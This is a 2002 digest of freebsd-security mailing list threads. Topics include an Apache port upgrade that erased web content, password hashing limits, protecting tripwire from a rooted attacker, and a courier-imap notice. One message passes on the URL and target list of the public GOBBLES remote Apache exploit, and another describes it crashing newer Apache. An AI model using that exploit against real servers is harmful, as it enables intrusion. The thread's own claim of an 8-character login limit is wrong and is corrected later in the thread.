Received: from ocsinternet.com (ool-18bed7b8.dyn.optonline.net [24.190.215.184]) by ra.upan.org (8.12.3/8.11.6) with ESMTP id g5K0ueEZ059840; Wed, 19 Jun 2002 20:56:40 -0400 (EDT) (envelope-from mikel@ocsinternet.com)
Message-ID: <3D112847.9050607@ocsinternet.com>
Date: Wed, 19 Jun 2002 20:56:39 -0400
From: Mikel King
User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:0.9.4) Gecko/20011126 Netscape6/6.2.1
X-Accept-Language: en-us
MIME-Version: 1.0
To: Bill Moran
Cc: jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG

Thank you. I was beginning to wonder if anyone else was going to say
anything... This is like saying I replaced my hard disk with a new one and
now my data is gone... Ok, I'm sorry, people do make mistakes...

Two suggestions from my own experience with working with Apache... kick the
default conf and directory tree to the curb. I always use my own web tree
structure, usually mounted on /web, and I make sure that I have copies of the
httpd.conf & php.ini as well... if you ever do a 'make deinstall' your data
will be safe because it's not in the /usr/local/www tree. In fact, to be
extra safe, after you cut a current tape, umount /web...

Cheers,
mikel

Bill Moran wrote:
> Jonathan Arnold wrote:
>
>>> I would consider this semi-correct, at least from my experience.
>>> The data
>>> directories ARE separated out. Notice that there is a data.default
>>> and a
>>
>>
>> I, in fact, just went through this and would beg to differ. It is not
>> very kind to delete a complete directory tree without any warning,
>> either
>> when you install (something like "data.default *WILL BE REPLACED ON
>> UPGRADE*") or it should check on upgrade and not remove it if it is
>> there.
>> I lost my entire web site with nary a peep, and luckily had the most
>> important
>> stuff on another computer.
>
>
> This is outrageous. Have you ever heard of backups? I can't believe
> you're
> blaming loss of data on this. As a system administrator you should be
> backing
> up your data on a regular schedule. And you should ALWAYS back up your
> data
> before ANY upgrade. That's just proper procedure.
From owner-freebsd-security Wed Jun 19 20:19: 5 2002
Delivered-To: freebsd-security@freebsd.org
Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 1717937B40C for ; Wed, 19 Jun 2002 20:18:59 -0700 (PDT)
Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g5K3Hsd09419 for ; Wed, 19 Jun 2002 22:17:54 -0500 (CDT) (envelope-from admin@crimelords.org)
Date: Wed, 19 Jun 2002 22:17:54 -0500 (CDT)
From: admin
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
In-Reply-To: <3D112847.9050607@ocsinternet.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG

I'm totally lost because I just did a cvsup on the ports, went to the port,
make && make install, and I didn't lose anything. I did this on 3 machines
and every single one of them is working fine with php, sql and everything as
it was before the install. I'm guessing others got it to work as well, maybe
there were some custom installs?

I've got a few linux boxes I was going to upgrade tomorrow.... hope they go
as well (I'll backup everything to play it safe)

-emacs

From owner-freebsd-security Wed Jun 19 21:55:40 2002
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 456B637B40F for ; Wed, 19 Jun 2002 21:55:36 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA29310; Wed, 19 Jun 2002 22:54:51 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20020619225221.023306b0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 19 Jun 2002 22:54:46 -0600
To: Mikel King , Bill Moran
From: Brett Glass
Subject: Re: Apache 1.3.26 port
Cc: jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG
In-Reply-To: <3D112847.9050607@ocsinternet.com>
References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG

At 06:56 PM 6/19/2002, Mikel King wrote:

>Two suggestions from my own experience with working with Apache...kick the
>default conf and directory tree to the curb.

I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball,
letting it use its default directory (/usr/local/apache2). It wouldn't run;
it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types,
even though that path was not in Apache's standard tree at all! Not sure
what is going on here. Any ideas?

--Brett

From owner-freebsd-security Wed Jun 19 22: 8:41 2002
Delivered-To: freebsd-security@freebsd.org
Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id B8B7937B41E for ; Wed, 19 Jun 2002 22:08:17 -0700 (PDT)
Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5K53h9g049482; Thu, 20 Jun 2002 01:03:44 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com)
From: "Eric F Crist"
To: "'Ryan Thompson'" , "'Bill Moran'"
Cc:
Subject: RE: Password security
Date: Thu, 20 Jun 2002 00:08:14 -0500
Message-ID: <001b01c21818$7c748d10$77fe180c@armageddon>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: <20020619154831.Q32240-100000@ren.sasknow.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG

Ryan Thompson wrote to Bill Moran:

[...]

Yes, certainly. Calculating the entropy of that beast would be a bit
difficult... One could just say 26^20, but if I know (or guess) it's
English, and every letter doesn't occur with nearly the same
probability, it's less than that. If I happen to know your algorithm,
and have a dictionary of poetry and/or lyrics handy, it's a *lot* less
than that. If you can mix upper/lower and add punctuation (i.e., "Lo,
Fred's chickens laid 24 eggs!" => "L,F'scl2e!", makes for a stronger
password). More stats than I'd like to do at the moment. :-)

[...]
What I failed to point out was that, if you're using FreeBSD, which I
assume you are as you're posting to this group, the FreeBSD login utility
still only recognizes 8 character passwords, unless you've changed that.
A 20 character password will still do you no good since:

ad93fj93ja@#9cjf@jfd

is looked at as the exact same password as:

ad93fj93e93jf!edkjie

Just a thought....

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

From owner-freebsd-security Wed Jun 19 22:17:14 2002
Date: Thu, 20 Jun 2002 01:17:04 -0400
From: Klaus Steden
To: Maxlor
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: preventing tampering with tripwire
Message-ID: <20020620011704.G589@cthulu.compt.com>
References: <27700541.1024450071@[10.0.0.16]> <2799555.1024487443@[10.0.0.16]>
In-Reply-To: <2799555.1024487443@[10.0.0.16]>; from mail@maxlor.com on Wed, Jun 19, 2002 at 11:50:43AM +0200

>
> Putting the tripwire binary on an external, read only drive doesn't help.
> As I mentioned, an attacker who gained root could simply unmount the disk
> and place a tampered copy into the mountpoint dir. I would only notice this
> if I happened to have a closer look at df *and* the attacker was nice
> enough not to modify df too.
>
True, but that doesn't make it useless - nor was it suggested as a whole
solution - only part of a number of steps.
It does offer you a set of tools that are guaranteed reliable, though, which
is a godsend at times like that.

Klaus

From owner-freebsd-security Wed Jun 19 22:26:21 2002
Subject: Re: Apache 1.3.26 port
From: Jan Lentfer
To: jdarnold@buddydog.org
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <200206191723590704.0033D6FF@mail.speakeasy.net>
References: <200206191723590704.0033D6FF@mail.speakeasy.net>
Date: 20 Jun 2002 07:24:27 +0200
Message-Id: <1024550667.2170.11.camel@jan-linnb.lan>

On Wed, 2002-06-19 at 23:23, Jonathan Arnold wrote:

> >I would consider this semi-correct, at least from my experience. The data
> >directories ARE separated out. Notice that there is a data.default and a
>
> I, in fact, just went through this and would beg to differ.
> It is not
> very kind to delete a complete directory tree without any warning, either
> when you install (something like "data.default *WILL BE REPLACED ON
> UPGRADE*") or it should check on upgrade and not remove it if it is there.
> I lost my entire web site with nary a peep, and luckily had the most important
> stuff on another computer.
>
> Nothing, anywhere, says anything about data.default getting overwritten /
> replaced on upgrade.

I agree. I am pretty much a newbie to FreeBSD and I must admit I didn't even
know about the data / data.default symlink thing with apache for the first few
weeks, because I just always typed "cd /usr/local/www/data" and really never
ls'd the www directory (OK, shoot me :-) ). Yes, people who say "back up your
data" are absolutely right. But still I think the port should have 2 things:

1) A notice on the symlink structure of "data.default" and "data" on first
   installation (if it is there I just didn't read it, which is NOT
   impossible ;-) )

2) A warning about overwriting the default directories - like "type 'yes' to
   proceed".

I guess that's not too much work and it would prevent people without backups
from losing their data ;-).
Jan

From owner-freebsd-security Wed Jun 19 23:13:33 2002
Message-ID: <1024553804.3d11734c7c04a@webmail.sambolian.net.nz>
Date: Thu, 20 Jun 2002 18:16:44 +1200
From: Andrew Thompson
To: admin@crimelords.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port

It depends if you have the files in /usr/local/www/data.default or
/usr/local/www/data; on an install, data is symlinked to data.default and it's
data.default that gets clobbered.

-Andrew

Quoting admin:

>
> I'm totally lost because I just did a cvsup on the ports, went to the port,
> make && make install and I didn't lose anything. I did this on 3
> machines and every single one of them is working fine with php, sql and
> everything as it was before the install.
> I'm guessing others got it to
> work as well, maybe there were some custom installs? I've got a few linux
> boxes I was going to upgrade tomorrow....hope they go as well (I'll back up
> everything to play it safe)
>
> -emacs
>

From owner-freebsd-security Wed Jun 19 23:26:02 2002
Message-ID: <3D1176AB.F3DA489C@netxsecure.net>
Date: Thu, 20 Jun 2002 18:31:07 +1200
From: "Michael A. Williams"
Reply-To: mike@netxsecure.net
To: Maxlor
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: preventing tampering with tripwire
References: <27700541.1024450071@[10.0.0.16]>

Hi,

Maxlor wrote:
>
> After being rooted recently (no idea how it happened - I was following the
> SAs and whatnot... and yes, I already formatted and reinstalled), I decided
> to install tripwire, so I would be alerted to something like that sooner.
Good idea. Check out Aide as well, and then our signed_exec kernel patches
from http://www.trojanproof.org . As time allows, and as further testing of
the V2 code (which is available as a beta only for OpenBSD 3.1 Release)
permits, we will port the V2 code to FreeBSD 4.6 Release and the stable
branch as well as current, which extends coverage from binaries and scripts
to KLDs and shared libraries. DO read our paper at
http://www.trojanproof.org/sigexec.pdf for an idea of what we are up to, and
be sure to note that our original reference code checks binaries and scripts
only, in a relatively simple and stable way that is very compute expensive,
whereas the new V2 code does more and very efficiently.

> The thing installed fine and is running ok, there's just this one thing
> that's puzzling me:
>
> How do I prevent an intruder that somehow gains root on my machine from
> simply replacing the tripwire binary that always gives me an "everything
> ok" report?

Include the binary in your tripwire or aide checklist, then do an md5 or sha1
signature check of the database and have a human check this with a copy kept
off the system daily.

> I've been considering putting the binary on a floppy or CD, but then an
> intruder could simply unmount the disk and place the replacement binaries
> in the mountpoint dir.

Run the system in securelevel 2 to avoid raw access to the disk, and monitor
the system log after each and every reboot.

> I'm currently running tripwire as a nightly cronjob, and I'd rather not
> resort to mounting a disk, running tripwire from it manually, then
> unmounting it. You know, my laziness and the effort needed to do this would
> lead to me eventually no longer doing it...
>
> So, how did you solve this problem?

Combine security features relative to your risk and the cost in terms of
effort you are prepared to put in.
If I had more time I would be offering assistance with porting the cool new
systrace facility just integrated into the OpenBSD base system in OpenBSD
current, see http://www.citi.umich.edu/u/provos/systrace - someone please :)

Cheers,
Mike.

--
Michael A. Williams
Security Software Engineering and InfoSec Manager
NetXSecure NZ Limited, http://www.nxs.co.nz
Ph: +64.3.318.2973  Fax: +64.3.318.2975  Mob: +64.21.995.914

From owner-freebsd-security Wed Jun 19 23:36:34 2002
Date: Thu, 20 Jun 2002 14:36:23 +0800
From: Jimmy
To: freebsd-security@freebsd.org
Subject: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated]
Message-Id: <20020620143623.1a2565c4.jimmy@tricom.com.ph>
Organization: Tricom

Hello,

I received the security advisory, therefore I cvsuped the src and ports, but
after cvsuping the ports I noticed that courier-imap is not updated:

PORTNAME=	courier-imap
PORTVERSION=	1.4.3
PORTREVISION=	0
CATEGORIES=	mail ipv6
MASTER_SITES=	${MASTER_SITE_SOURCEFORGE}
MASTER_SITE_SUBDIR=	courier

Is there something wrong with my cvsup?

Thanks in Advance

--
Jimmy Lim
Operation & Support Team Leader
IT Department
Tricom

From owner-freebsd-security Thu Jun 20 01:44:42 2002
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: "Eric F Crist"
Cc: "'Ryan Thompson'", "'Bill Moran'"
Subject: Re: Password security
References: <001b01c21818$7c748d10$77fe180c@armageddon>
From: Dag-Erling Smorgrav
Date: 20 Jun 2002 10:44:32 +0200
In-Reply-To: <001b01c21818$7c748d10$77fe180c@armageddon>

"Eric F Crist" writes:
> What I failed to point out was that, if you're using FreeBSD, which I
> assume you are as you're posting to this group, the FreeBSD login utility
> still only recognizes 8 character passwords, unless you've changed that.

Wrong.
The 8-character limit was imposed by the traditional DES-based password
hashing algorithm, not by login(1). By default, FreeBSD uses an MD5-based
hash, and supports passwords of arbitrary length.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 02:49:55 2002
Date: Thu, 20 Jun 2002 02:49:35 -0700 (PDT)
From: Muhammad Faisal Rauf Danka
To: isp-tech@isp-tech.com, isp-security@isp-security.com, isp-linux@isp-linux.com
Cc: freebsd-security@freebsd.org, security-discuss@linuxsecurity.com
Reply-To: mfrd@attitudex.com
Message-Id: <20020620094935.9CB9036F9@sitemail.everyone.net>

GOBBLES Security released Remote Apache 1.3.x Exploit, at
http://online.securityfocus.com/attachment/2002-06-20/apache-scalp.c

As it's mentioned in the exploit that:

<
 * The "experts" have already concurred that this bug...
 * - Can not be exploited on 32-bit *nix variants
 * - Is only exploitable on win32 platforms
 * - Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 * Sun Solaris 6-8 (sparc/x86)
 * FreeBSD 4.3-4.5 (x86)
 * OpenBSD 2.6-3.1 (x86)
 * Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
>

So I think x86 apache admins shouldn't be like "[ aah its only for win32 and
64 bit *nixes, ]" and I again repeat that even 64 bit *nixes include SPARC
Solaris which is found in abundance. I think it's about time Sun people
should take notice of it. Sites like sunfreeware.com and alike should put
updated apache packages, else bad time for solaris sparc apache admins.

Regards,
---------
Muhammad Faisal Rauf Danka
Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Vice President
Pakistan Computer Emergency Response Team (PakCERT)
web: www.pakcert.org
Chief Security Analyst
Applied Technology Research Center (ATRC)
web: www.atrc.net.pk

From owner-freebsd-security Thu Jun 20 03:04:27 2002
Date: Thu, 20 Jun 2002 03:03:47 -0700 (PDT)
From: Muhammad Faisal Rauf Danka
To: freebsd-security@freebsd.org
Subject: Apache vulnerability for 32 bit *nix and 64 bit *nix (solaris/SPARC)
Reply-To: mfrd@attitudex.com
Message-Id: <20020620100347.BA9563ECC@sitemail.everyone.net>

GOBBLES Security released Remote Apache 1.3.x Exploit, at
http://online.securityfocus.com/attachment/2002-06-20/apache-scalp.c

As it's mentioned in
the exploit that:

<
 * The "experts" have already concurred that this bug...
 * - Can not be exploited on 32-bit *nix variants
 * - Is only exploitable on win32 platforms
 * - Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 * Sun Solaris 6-8 (sparc/x86)
 * FreeBSD 4.3-4.5 (x86)
 * OpenBSD 2.6-3.1 (x86)
 * Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
>

So I think x86 apache admins shouldn't be like "[ aah its only for win32 and
64 bit *nixes, ]" and I again repeat that even 64 bit *nixes include SPARC
Solaris which is found in abundance. I think it's about time Sun people
should also take notice of it. Sites like sunfreeware.com and alike should
put updated apache packages. Else bad time for solaris sparc apache admins.

Regards,
---------
Muhammad Faisal Rauf Danka
Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Vice President
Pakistan Computer Emergency Response Team (PakCERT)
web: www.pakcert.org
Chief Security Analyst
Applied Technology Research Center (ATRC)
web: www.atrc.net.pk

From owner-freebsd-security Thu Jun 20 03:44:42 2002
Date: Thu, 20 Jun 2002 14:44:35 +0400 (MSD)
From: Maxim Kozin
To: freebsd-security@freebsd.org
Subject: Re: Apache expoit?
In-Reply-To: <2147483647.1024500409@[192.168.4.154]>

On Wed, 19 Jun 2002, Jason DiCioccio wrote:

> I don't know if this has already made bugtraq, or if it's waiting in their
> queue or what.. But I just happened to get ahold of this recently. It
> appears that FreeBSD and OpenBSD are exploitable.

...skipped...

The "exploit" from this letter was tested on FreeBSD 4.6-RELEASE with
different Apache versions:

1) 2.0.36
2) 2.0.39
3) 1.3.26

In cases 1) and (!) 2) the httpd child died with "child out of swap space".
So, a DoS still exists in 2.0.39. The solution with login.conf did not work,
because Apache does not use the setclass*() / setusercontext() functions.

p.s. 2.0.39 was configured as:

./configure \
	"--with-layout=Apache" \
	"--enable-threads" \
	"--enable-shared=max" \
	"--enable-module=all" \
	"--with-mpm=worker"

b.r.
Kozin Maxim

From owner-freebsd-security Thu Jun 20 03:58:44 2002
Message-ID: <200206200658470001.031DD337@mail.speakeasy.net>
Date: Thu, 20 Jun 2002 06:58:47 -0400
Reply-To: jdarnold@buddydog.org
From: "Jonathan Arnold"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port

>data.default? Or are you saying that it was linked to data.default and you
>think (as well as I) that it should let you know before blowing
>data.default away (perhaps a make flag)?

Yes, that's what I'm saying - it completely replaced data.default without
warning, and it shouldn't.
--
Jonathan Arnold (mailto:jdarnold@buddydog.org)
The Incredible Brightness of Seeing, a Home Theater weblog
http://jdarnold.tzo.com/HomeTheater

From owner-freebsd-security Thu Jun 20 04:01:39 2002
Message-ID: <200206200701240307.032039B1@mail.speakeasy.net>
In-Reply-To: <3D110D17.50809@potentialtech.com>
References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com>
Date: Thu, 20 Jun 2002 07:01:24 -0400
Reply-To: jdarnold@buddydog.org
From: "Jonathan Arnold"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port

>> I lost my entire web site with nary a peep, and luckily had the most important
>> stuff on another computer.

>This is outrageous. Have you ever heard of backups? I can't believe

No kidding. Notice how I said that I had most of the other stuff on another
computer.

>you're
>blaming loss of data on this. As a system administrator you should be

Yeah, that is in fact *exactly* what I'm doing. After all, portupgrade
removed the directory tree without warning. Even if I had a 100% backup, it
still would have cost me a good part of the day to fix it.
It's very simple - don't delete and/or replace a folder without warning.

--
Jonathan Arnold (mailto:jdarnold@buddydog.org)
The Incredible Brightness of Seeing, a Home Theater weblog
http://jdarnold.tzo.com/HomeTheater

From owner-freebsd-security Thu Jun 20 04:12:20 2002
Message-Id: <200206201111.g5KBBq8t064689@aristotle.tamu.edu>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
In-Reply-To: Message from "Jonathan Arnold" of "Thu, 20 Jun 2002 06:58:47 EDT." <200206200658470001.031DD337@mail.speakeasy.net>
Date: Thu, 20 Jun 2002 06:11:52 -0500
From: Robin Smith

Worth adding that the apache port will also overwrite cgi-bin.default; if you
have /cgi-bin symlinked to that, you are also hosed. Though it's easy enough
to notice this, I too don't see why this particular gotcha needs to be in the
port. Why not just let the port create empty data and cgi-bin directories
rather than symlinks?

This is really off-topic for freebsd-security, but those of you who've lost
web site content might want to look again.
Robin Smith

From owner-freebsd-security Thu Jun 20 04:30:40 2002
Date: Thu, 20 Jun 2002 13:31:15 +0200
From: Sheldon Hearn
To: Jonathan Arnold
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
Message-ID: <20020620113115.GA73571@starjuice.net>
References: <200206200658470001.031DD337@mail.speakeasy.net>
In-Reply-To: <200206200658470001.031DD337@mail.speakeasy.net>

On (2002/06/20 06:58), Jonathan Arnold wrote:

> >data.default? Or are you saying that it was linked to data.default and you
> >think (as well as I) that it should let you know before blowing
> >data.default away (perhaps a make flag)?
>
> Yes, that's what I'm saying - it completely replaced data.default without
> warning, and it shouldn't.

I don't understand why it shouldn't.

Is it because people are replacing the contents of data.default with their
own content and leaving the symlink in place?

If so, then the problem has to do with the fact that folks aren't using the
symlinks and .defaults directories as intended. I think the intention was
always for the operator to replace the symlink with either a directory or a
symlink to the directory containing local content.
Ciao,
Sheldon.

From owner-freebsd-security Thu Jun 20 04:38:55 2002
Message-Id: <5.1.0.14.2.20020620073651.02008090@pbegames.com>
Date: Thu, 20 Jun 2002 07:38:57 -0400
To: freebsd-security@FreeBSD.ORG
From: Mark Thomas
Subject: Re: Apache 1.3.26 port
In-Reply-To: <20020620113115.GA73571@starjuice.net>
References: <200206200658470001.031DD337@mail.speakeasy.net>

At 01:31 PM 6/20/02 +0200, Sheldon Hearn wrote:
>Is it because people are replacing the contents of data.default with
>their own content and leaving the symlink in place?
>
>If so, then the problem has to do with the fact that folks aren't using
>the symlinks and .defaults directories as intended. I think the
>intention was always for the operator to replace the symlink with either
>a directory or a symlink to the directory containing local content.

OK, where exactly are these symlinks supposed to be? I upgraded 3 servers
last night with no issues (though in 2/3 cases I had non-standard locations
for data and cgi-bin directories).
I just reviewed the apache13 port tree and didn't see anything resembling the data.default symlink mentioned.

Mark Thomas --- thomas@pbegames.com ----> http://www.pbegames.com/~thomas
Play by Electron Games -> http://www.pbegames.com Free Trial Games

From owner-freebsd-security Thu Jun 20 04:49:20 2002
Date: Thu, 20 Jun 2002 12:48:18 +0100
From: Adam Laurie
Organization: A.L. Group plc
To: apache-ssl, apache-sslannounce, FreeBSD Security
Subject: ANNOUNCE: apache_1.3.26+ssl_1.48 released
Message-ID: <3D11C102.40307@algroup.co.uk>

This release incorporates the new version of apache that addresses the chunking issue described here:

http://www.apacheweek.com/features/security-13

(Apache Chunked encoding vulnerability CAN-2002-0392)

should hit mirrors shortly.

http://www.apache-ssl.org/#Download

cheers,
Adam
--
Adam Laurie                 Tel: +44 (20) 8742 0755
A.L. Digital Ltd.
                            Fax: +44 (20) 8742 5995
The Stores, 2 Bath Road, London W4 1LT, UNITED KINGDOM
http://www.thebunker.net
http://www.aldigital.co.uk
mailto:adam@algroup.co.uk
PGP key on keyservers

From owner-freebsd-security Thu Jun 20 04:53:29 2002
Date: Thu, 20 Jun 2002 13:53:47 +0200
From: Sheldon Hearn
To: Mark Thomas
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
Message-ID: <20020620115347.GC73571@starjuice.net>
In-Reply-To: <5.1.0.14.2.20020620073651.02008090@pbegames.com>

On (2002/06/20 07:38), Mark Thomas wrote:

> OK, where exactly are these symlinks supposed to be? I upgraded 3 servers
> last night with no issues (though in 2/3 cases I had non-standard locations
> for data and cgi-bin directories). I just reviewed the apache13 port tree
> and didn't see anything resembling the data.default symlink mentioned.

The symlinks aren't created if the cgi-bin and data directories already exist.
They're only created so that a default installation of Apache "works", in that http://localhost/ shows a page. If you already have cgi-bin and data directories, the port leaves them alone.

You can see the symlinks being created in the pkg-plist:

| www/data.default/apache_pb.gif
| @exec [ -d %D/www/data/ ] || ln -fs %B %D/www/data
| [...]
| www/cgi-bin.default/printenv
| @exec [ -d %D/www/cgi-bin/ ] || ln -fs %B %D/www/cgi-bin

You can see support for removing the symlinks at uninstall time in the pkg-plist:

| @unexec if [ -L %D/www/cgi-bin ]; then rm -f %D/www/cgi-bin; fi
| @unexec if [ -L %D/www/data ]; then rm -f %D/www/data; fi

So basically, folks who have their web content blown away by the port or package have fallen victim to a process that's actually intended to make things safe.

What was never considered was that people would leave the symlinks in place.

Ciao,
Sheldon.

From owner-freebsd-security Thu Jun 20 05:03:07 2002
Date: Thu, 20 Jun 2002 08:03:01 -0400
From: Bryan Fullerton
To: freebsd-security@FreeBSD.ORG
Cc: freebsd-ports@freebsd.org
Subject: Re: Apache 1.3.26 port
In-Reply-To: <20020620113115.GA73571@starjuice.net>
On Thursday, June 20, 2002, at 07:31 AM, Sheldon Hearn wrote:

> Is it because people are replacing the contents of data.default with
> their own content and leaving the symlink in place?

It's because the port does things significantly differently than installing from the distribution tarball and doesn't explain what it's doing. In this case, patching the Makefile.tmpl to include lines that do a rm -rf of the *.default directories.

Regardless, this seems more a -ports issue than a -security issue.

> If so, then the problem has to do with the fact that folks aren't using
> the symlinks and .defaults directories as intended. I think the
> intention was always for the operator to replace the symlink with either
> a directory or a symlink to the directory containing local content.

That the intention isn't clear indicates that this needs clarification. That people have lost data indicates that the documentation is incomplete.

Bryan

From owner-freebsd-security Thu Jun 20 05:22:06 2002
Date: Thu, 20 Jun 2002 07:21:59 -0500
From: "Jacques A. Vidrine"
To: Jimmy
Cc: freebsd-security@freebsd.org, nbm@freebsd.org
Subject: Re: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated]
Message-ID: <20020620122159.GB52793@madman.nectar.cc>
In-Reply-To: <20020620143623.1a2565c4.jimmy@tricom.com.ph>

On Thu, Jun 20, 2002 at 02:36:23PM +0800, Jimmy wrote:
> Hello,
>
> I received the security advisory, therefore, I cvsuped the src and
> ports, but after cvsuping the ports I noticed that courier-imap is
> not updated;
>
> PORTNAME=           courier-imap
> PORTVERSION=        1.4.3
> PORTREVISION=       0
> CATEGORIES=         mail ipv6
> MASTER_SITES=       ${MASTER_SITE_SOURCEFORGE}
> MASTER_SITE_SUBDIR= courier
>
> Is there something wrong with my cvsup?

No, there is something wrong with your Security Officer 8-)

I apologize. I had forgotten that I was waiting for comments from the port maintainer before committing the fix.

I went ahead and have now updated courier-imap to match the `facts' listed in FreeBSD-SN-02:04.

Thanks for catching and reporting!

Cheers,
--
Jacques A. Vidrine                    http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Thu Jun 20 05:42:16 2002
Date: Thu, 20 Jun 2002 20:41:59 +0800
From: Jimmy
To: "Jacques A. Vidrine"
Cc: freebsd-security@freebsd.org, nbm@freebsd.org
Subject: Re: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated]
Message-Id: <20020620204159.1eb50ec6.jimmy@tricom.com.ph>
In-Reply-To: <20020620122159.GB52793@madman.nectar.cc>
Organization: Tricom

On Thu, 20 Jun 2002 07:21:59 -0500 "Jacques A. Vidrine" wrote:

> On Thu, Jun 20, 2002 at 02:36:23PM +0800, Jimmy wrote:
> > Hello,
> >
> > I received the security advisory, therefore, I cvsuped the src and
> > ports, but after cvsuping the ports I noticed that courier-imap is
> > not updated;
> >
> > PORTNAME=           courier-imap
> > PORTVERSION=        1.4.3
> > PORTREVISION=       0
> > CATEGORIES=         mail ipv6
> > MASTER_SITES=       ${MASTER_SITE_SOURCEFORGE}
> > MASTER_SITE_SUBDIR= courier
> >
> > Is there something wrong with my cvsup?
>
> No, there is something wrong with your Security Officer 8-) I
> apologize. I had forgotten that I was waiting for comments from the
> port maintainer before committing the fix.
>
> I went ahead and have now updated courier-imap to match the `facts'
> listed in FreeBSD-SN-02:04.
>
> Thanks for catching and reporting!
>
> Cheers,
> --
> Jacques A. Vidrine                    http://www.nectar.cc/
> NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
> jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

You're welcome, thanks anyway.

regards,
--
Jimmy Lim
Operation & Support Team Leader
IT Department
Tricom

From owner-freebsd-security Thu Jun 20 05:46:19 2002
Date: Thu, 20 Jun 2002 14:46:30 +0200
From: Neil Blakey-Milner
To: Sheldon Hearn
Cc: Mark Thomas, freebsd-ports@FreeBSD.ORG, ache@FreeBSD.org
Subject: Re: Apache 1.3.26 port
Message-ID: <20020620124630.GC15674@mithrandr.moria.org>
In-Reply-To: <20020620115347.GC73571@starjuice.net>
Organization: iTouch Labs

On Thu 2002-06-20 (13:53), Sheldon Hearn wrote:
> The symlinks aren't created if the cgi-bin and data directories already
> exist. They're only created so that a default installation of Apache
> "works", in that http://localhost/ shows a page. If you already have
> cgi-bin and data directories, the port leaves them alone.

> So basically, folks who have their web content blown away by the port or
> package have fallen victim to a process that's actually intended to make
> things safe.
>
> What was never considered was that people would leave the symlinks in
> place.

[ security -> ports ]

It also removes all the contents of data.default not installed by apache, such as those installed by phpMyAdmin, phpPgAdmin, sqwebmail, qmailadmin, and so forth. I see no obvious reason the port should behave differently than all other ports in this regard - only remove it if you install it.

This hasn't really affected me, except that it breaks my phpMyAdmin.... ports. So I just reinstall. But it's irritating.
Anyone have any good reason we should not just remove that change? Andrey, any thoughts?

Neil
--
Neil Blakey-Milner
